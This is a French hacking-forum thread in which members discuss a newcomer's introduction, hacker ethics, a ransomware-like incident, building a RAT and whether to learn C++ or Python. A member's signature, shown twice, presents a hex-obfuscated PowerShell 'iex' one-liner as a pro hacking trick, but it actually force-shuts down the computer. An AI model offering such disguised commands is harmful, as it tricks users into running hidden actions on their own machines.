Annonce

Réduire
Aucune annonce.

Acloseone

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Acloseone

    Bonjour,

    Mieux valant tard que jamais, j'en profite pour poser ces quelques lignes de présentation. Je ne me considère pas comme "bon" en informatique, mais plutôt comme débrouillant, surtout sur Linux car j'ai toujours au du mal avec Windows, et pour Mac ? Connais pas ! J'ai juste quelques domaines qui m'intéressent plus que d'autres dont évidemment la sécurité ou la cybersécurité.

    J'ai un peu du mal avec le terme "hacker" tant il a été galvaudé par un peu tout le monde, et pas que par la presse despécialisée. Comme dans tous les domaines, il y a toujours un groupe de "vrais" et un groupe de "faux", chacun tirant la couverture à lui pour essayer de convaincre qu'il n'y a qu'une seule définition des "vrais", la sienne et celle de son groupe d'appartenance dans lequel vous n'aurez droit d'accés qu'à grands coups d'allégeance et de respect d'une hierarchie arbitraire préexistante. Mais c'est le prix à payer pour être un vrai, non ? Non... Je ne discute évidemment pas ici la définition des scripkiddies, je pense que tout le monde est d'accord là dessus, mais je parle de tout le reste. On dirait que tout le monde veut l'être sans que les autres en aient le droit, et c'est, je crois, ce qui me dérange le plus dans le milieu de la sécurité informatique. Alors, au diable la définition consensuelle, qu'il s'agisse d'un bidouilleur de code (définition large) ou bidouilleur en sécurité informatique (définition plus restreinte). Finalement, le plus important, ce n'est pas l'étiquette, mais de faire "bien" (à chacun sa définition de "bien").

    Pour faire non consensuel, je me considèrerais donc comme un non-hacker faisant parfois du hacking. Pour mes compétences, je ne sais pas. Je pense que mon approche est plutôt systémique qu'informatique, donc je ne suis pas un pro du codage, du buffer overflow, du shellcode ou du maniement de kali linux. En général, en fonction d'hypothèses, je récupère des bouts de codes de ci et de là que j'assemble pour vérifier des trucs qui finissent généralement par être des hacks. Rien de bien extraordinaire (sauf une "0 day" pour devenir admin sur phpbb, il y a belle lurette), mais de quoi s'amuser et se satisfaire quand ça marche. Après, je dois reconnaitre que j'ai plutôt un passif de "grey hacks" (disons gris clair). Jamais rien de méchant, et j'ai (presque) toujours envoyé la vulnérabilité à qui de droit (sauf openbb, mais ça n'existe plus et c'était il y a longtemps). Après, je pense être un peu puriste dans le sens où je conçois mes hacks comme une production personnelle. Donc pas d'outils d'autres personnes ou de failles déjà connues s'il n'y a pas, dans la chaine d'évènements de mon hack, une production et une trouvaille de mon cru. Pour moi, ça n'aurait pas un grand intérêt sinon.

    Voilà, j'ai été un peu long, mais c'était pour vous discuader de lire !
    Dernière modification par acloseone, 23 juillet 2018, 22h30.

  • #2
    Bonjour tout le monde, Bonjour acloseone, personnellement je n'y connais pas grand chose mais j'espère apprendre dans le but précis de me défendre !
    Effectivement j'ai eu il n'y a pas très longtemps la mauvaise surprise de trouver mon bureau sous Win8 vide avec un fichier Text m'expliquant que je venais de me faire pirater mes fichiers et que je pouvais contacter la personne à une adresse email précise .... Bref, tout cela alors que mon PC a un antivirus .. etc,
    donc si je comprends bien "acloseone" tu t'y connais ? :-)
    Par hasard connais tu ce genre d'attack ?
    Merci par avance pour toute réponse :-)

    Commentaire


    • #3
      Envoyé par Batcher Voir le message
      Bonjour tout le monde, Bonjour acloseone, personnellement je n'y connais pas grand chose mais j'espère apprendre dans le but précis de me défendre !
      Effectivement j'ai eu il n'y a pas très longtemps la mauvaise surprise de trouver mon bureau sous Win8 vide avec un fichier Text m'expliquant que je venais de me faire pirater mes fichiers et que je pouvais contacter la personne à une adresse email précise .... Bref, tout cela alors que mon PC a un antivirus .. etc,
      donc si je comprends bien "acloseone" tu t'y connais ? :-)
      Par hasard connais tu ce genre d'attack ?
      Merci par avance pour toute réponse :-)
      Bonjour,

      J'ai juste les connaissances que j'ai, ni plus ni moins... Sur Windows, j'ai du mal, faudrait que je m'y mette, ne serait-ce que pour pondre un RAT pour voir ce que ça donne. C'est assez formateur de pondre un RAT pour appronfondir nos connaissances sur les défenses d'un système en voulant les contourner avec ce genre d'outils. Après, je pense qu'il aurait fallu que tu ouvres un topic sur ce forum pour avoir plus de réponses à ta question. Mon point de vue, plusieurs possibilités : Je pars du principe que ton ordinateur avait un anti-virus, était bien configuré et à jour. Il peut y avoir l'attaque "evil maid", soit quelqu'un qui t'a installé un RAT directement depuis ton ordinateur, la plus facile. Ou alors, tu t'es pris un trojan, autrement dit quelqu'un qui t'a fait passer un fichier vérolé contenant un RAT qui s'est installé à ton insu (voire même par fishing, etc). Après, si tout était à jour, ça se complique rapidement. Mais finalement même un vieux fichier bash doit pouvoir faire ce job (vider ton dossier), donc le tout, c'est de savoir comment on a eu accés à ta machine. Après, des fois, on pense être à jour et on ne l'est pas complètement, et à ce jeu là, des scans de vulnérabilités seront beaucoup plus intransigeant que l'attention humaine. Par contre, je pense qu'un peut oublier l'exploitation d'une "0 day", car on ne fait ce genre de choses lorsque l'on en dispose.

      Commentaire


      • #4
        Bonjour et bienvenue !

        Commentaire


        • #5
          Bonjour,

          J'avoue que ta présentation met le doigt sur deux ou trois choses sur lesquelles je voulais m'exprimer.

          Avec un peu de recul, on conçoit sans peine que chacun trouve dans ce domaine de quoi le contenter et, selon les individus, il ne s'agit pas à l'évidence de la même chose. Je pense avoir l'esprit assez ouvert et il n'y a guère que deux idées qui me révulsent : le désir sous-jacent de nuire et aussi vouloir accéder (par le hacking) à une sorte de pouvoir.

          Pour le reste, on trouve des bidouilleurs, des gens dont la sécurité est le métier et toutes sortes de personnes curieuses. Comme toi, je n'aime guère les outils tout faits car les utiliser ne permet pas d'apprendre grand-chose (je ne dis pas qu'ils ne servent à rien mais juste que ce n'est pas le top pour comprendre les failles). En vérité, je préfère coder dans mon coin afin de comprendre au mieux un domaine donné.

          Concernant ton RAT sous linux, j'espère avoir le temps de m'y pencher. Mais temps cela demandera, car je connais assez peu bash et je ne suis plus sous linux depuis belle lurette (mais toujours sous UN*X en partie).

          Quoiqu'il en soit, bienvenue dans ce forum un poil orphelin.



          Commentaire


          • #6
            Merci pour vos réponses.

            Envoyé par Icarus Voir le message
            Bonjour,

            J'avoue que ta présentation met le doigt sur deux ou trois choses sur lesquelles je voulais m'exprimer.

            Avec un peu de recul, on conçoit sans peine que chacun trouve dans ce domaine de quoi le contenter et, selon les individus, il ne s'agit pas à l'évidence de la même chose. Je pense avoir l'esprit assez ouvert et il n'y a guère que deux idées qui me révulsent : le désir sous-jacent de nuire et aussi vouloir accéder (par le hacking) à une sorte de pouvoir.

            Pour le reste, on trouve des bidouilleurs, des gens dont la sécurité est le métier et toutes sortes de personnes curieuses. Comme toi, je n'aime guère les outils tout faits car les utiliser ne permet pas d'apprendre grand-chose (je ne dis pas qu'ils ne servent à rien mais juste que ce n'est pas le top pour comprendre les failles). En vérité, je préfère coder dans mon coin afin de comprendre au mieux un domaine donné.

            Concernant ton RAT sous linux, j'espère avoir le temps de m'y pencher. Mais temps cela demandera, car je connais assez peu bash et je ne suis plus sous linux depuis belle lurette (mais toujours sous UN*X en partie).

            Quoiqu'il en soit, bienvenue dans ce forum un poil orphelin.
            J'en déduis à ton avatar que tu dois être sous BSD ? Perso, ce sont les autres langages de programmation sur lesquels faudrait que je m'y mette sérieusement (au moins python et C, au moins de quoi se débrouiller). Quand je me penche sur un programme en python ou en C, j'ai du mal à voir une logique ne serait-ce que proche du bash (exception faite des conditions, etc, propres aux systèmes électroniques).

            Oui pour le fait de nuire ou d'avoir du pouvoir, quelque part, ce sont les caractéristiques les plus marquantes de l'être humain mal dégrossi et on trouve ça dans tous les domaines, même des malfrats aux magistrats. A éviter donc.

            Après, effectivement, je ne sais pas ce qu'il s'est passé sur ce forum, on dirait qu'il y a eu de grosses périodes d'activités, et là, plus rien ? C'est les vacances ?

            Commentaire


            • #7
              Bonjour,

              Python ou C ne sont que des langages comme bash avec qui on parle... La logique est déterminée par une science nommée algorithmie, ce qui fait que lorsqu'on cherche à parler avec un langage, rechercher le terme algorithmique et le langage donneront les résultats adaptés. On retrouve, pour pratiquer le bash, python et C la même logique.

              Bonne journée

              Commentaire


              • #8
                D'accord, il y a l'algorithme mais... Le fait est que certains langages sont plus faciles à lire que d'autres selon ses propres connaissances. Et franchement, le plus dur entre python et bash, pour moi, c'est bash. Je ne sais rien faire en python mais je le comprends aisément. Après, bien sûr, il suffit de s'y mettre et tout va mieux.

                Pour répondre à acloseone, je suis assez souvent sous FreeBSD, en effet ; le reste du temps étant Windows (je programme beaucoup sur cet OS).

                De mon point de vue, seules la connaissance et la curiosité devraient motiver le hacking.

                Concernant ce forum, disons que j'ai été très déçu du laisser-aller en terme de modération, dû à l'absence longue et répétée des admins.

                Commentaire


                • #9
                  Merci pour vos réponses. Du coup, la grande question, c'est : faut-il commencer par C++ ou python ? Je crois avoir compris que pour faire du cross-platform, python était préférable, mais en revanche, ça donne des scripts ouverts et lisibles, ce qui n'est pas le cas en C++. De plus, il me semble avoir lu que le C++ était beaucoup plus axé performance avec des rapports de la centaine au milier en terme de vitesse de traitement (et donc son opposé proportionnel en terme de charge processeur) par rapport à bash par exemple.

                  Après, effectivement, je viens de faire quelques tests en python, et ça m'a l'air jouable. Finalement, le plus dur, c'est toujours de faire les premiers pas dans le language. Comme apprendre une langue étrangère, dés qu'on entend les premiers mots et qu'on comprend que dalle, on se demande si l'on va vraiment réussir un jour à capter quelque chose...

                  PS : avec le passage vers Python 3, je l'ai, ma réponse : faut commencer par le C++ !
                  Dernière modification par acloseone, 26 juillet 2018, 22h10.

                  Commentaire


                  • #10
                    Salut, bienvenue

                    Pour ta question C++ vs Python, ça revient un peu à se demander si c'est plus cool d'avoir un permis bateau, ou un permis poids lourd... Ca va peut être pas t'aider, mais c'est l'idée.

                    T’apprendra l'un ou/et l'autre quand t'auras décidé de ce que t'as besoin de faire avec
                    Hack like a pro :
                    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                    Commentaire


                    • #11
                      Merci.

                      Ca va être C++ ! Ce serait principalement pour tester quelques trucs sur windows, et python n'y étant pas installé d'origine, des bidules en python, ça ne va pas le faire.



                      Commentaire


                      • #12
                        Pis sincèrement, quand tu maîtrises déjà un langage "bas niveau" type C ou C++, (Icarus te dirais que C++ c'est déjà un langage haut niveau ) le python c'est l'affaire de 10h à apprendre.
                        Par contre si t'as besoin de scripter un truc vite fait, il sera temps de te mettre au python
                        Hack like a pro :
                        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                        Commentaire


                        • #13
                          Envoyé par Krisscool Voir le message
                          Pis sincèrement, quand tu maîtrises déjà un langage "bas niveau" type C ou C++, (Icarus te dirais que C++ c'est déjà un langage haut niveau ) le python c'est l'affaire de 10h à apprendre.
                          Par contre si t'as besoin de scripter un truc vite fait, il sera temps de te mettre au python
                          Avec C et C++, on peut faire à peu près tout. C++ amène en effet l'abstraction nécessaire pour faire du "haut niveau" mais bon... Quand on bidouille, je n'en vois pas l'intérêt. Cela devient utile lorsqu'on se lance dans des programmes complexes. De mon point de vue, le mieux est effectivement C++ (quelle surprise ! ) mais il faut commencer à l'utiliser comme du C. C'est-à-dire sans se préoccuper de la conception objet, sans faire de classes ou alors juste des classes basiques. Et quand je dis commencer, pour ma part, je programme souvent ainsi, lorsque le problème à traiter est simple. Après, il est possible de gravir les pentes de l'abstraction, lorsque le sujet s'y prête.

                          Le C/C++ sont des langages compilés (et bien compilés), donc au niveau vitesse, il n'y a pas grand-chose de mieux (mais avec la puissance des ordinateurs actuels, ce n'est pas toujours un argument et cela dépend fortement de l'application). Le revers de la médaille, c'est que lorsque tu fais une erreur de manipulation mémoire (ou autres choses dans le genre), ce n'est pas toujours évident de mettre le doigt sur le code à l'origine du souci. Tu verras, tu risques de passer de longues minutes à te demander, lorsque ça plante "sans raison", si quelqu'un n'a pas fait des manipulations vaudou sur ton PC...

                          L'avantage, c'est que beaucoup d'autres langages, y-compris certains scripts, reprennent la logique voire, en partie, la syntaxe du C. Du coup, ces langages sont relativement faciles à lire si tu connais le C/C++.
                          Dernière modification par Icarus, 28 juillet 2018, 11h22.

                          Commentaire


                          • #14
                            Merci pour ces infos, j'en prends bonne note ! Pour les erreurs de code, codant à l'envers (je récupére ce qui m'intéresse, je l'analyse pour comprendre comment ça marche et ensuite je change les variables pour lui faire faire ce que je souhaite), je suis plutôt habitué à passer des heures à chercher la boulette... Juste que compilé, je suppose que ça va être encore pire ! C'est pour ça que je vais attendre la fin des vacances pour m'y mettre, histoire d'en profiter un peu quand même !

                            Commentaire


                            • #15
                              10h pour apprendre c'est vite dit, ça dépend de tes capacités, de tes connaissances au préalable et de ta facilité à comprendre et résoudre un problème.

                              Quand à moi qui fait python et c++ depuis pas mal d'années, je conseillerais Python (pas de surprise non plus de ce côté). Le C++ n'est pour moi qu'un outil pour optimiser mes codes Python. Il vaut mieux, mais en terme de rapidité de développement, on peut guère faire mieux que Python, et y ajouter quelques librairies C++ personnelles comme glue à mon langage avec cython par exemple devient simples (question d'habitude).

                              Sur ce forum, tu y verras des cours de Python, C et C++... mais c'est du rapide (sauf python et C) comparé à certains cours du net.

                              Commentaire

                              Chargement...
                              X